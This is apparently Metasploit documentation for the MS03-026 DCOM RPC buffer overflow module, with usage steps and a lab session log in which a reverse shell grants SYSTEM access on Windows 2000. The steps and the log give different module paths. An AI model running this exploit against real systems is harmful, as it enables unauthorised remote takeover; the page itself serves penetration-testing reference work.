44 lines
1.3 KiB
Markdown
44 lines
1.3 KiB
Markdown
|
## Vulnerable Application
|
||
|
|
|
||
|
|
This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
|
||
|
|
was originally found by the Last Stage of Delirium research group and has been
|
||
|
|
widely exploited ever since. This module can exploit the English versions of
|
||
|
|
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Start msfconsole
|
||
|
|
1. Do: `use exploit/windows/smb/ms03_026_dcom`
|
||
|
|
1. Do: `set rhosts <rhosts>`
|
||
|
|
1. Do: `run`
|
||
|
|
1. You should get a `SYSTEM` shell.
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
### Windows 2000 Server SP4 (English)
|
||
|
|
|
||
|
|
```
|
||
|
|
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 172.16.191.192:4444
|
||
|
|
[*] 172.16.191.164:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
|
||
|
|
[*] 172.16.191.164:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.191.164[135] ...
|
||
|
|
[*] 172.16.191.164:135 - Calling DCOM RPC with payload (1648 bytes) ...
|
||
|
|
[*] Encoded stage with x86/shikata_ga_nai
|
||
|
|
[*] Sending encoded stage (267 bytes) to 172.16.191.164
|
||
|
|
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.164:1027 ) at 2021-11-27 23:52:35 -0500
|
||
|
|
|
||
|
|
|
||
|
|
Shell Banner:
|
||
|
|
Microsoft Windows 2000 [Version 5.00.2195]
|
||
|
|
(C) Copyright 1985-2000 Microsoft Corp.
|
||
|
|
|
||
|
|
C:\WINNT\system32>
|
||
|
|
-----
|
||
|
|
|
||
|
|
|
||
|
|
C:\WINNT\system32>
|
||
|
|
```
|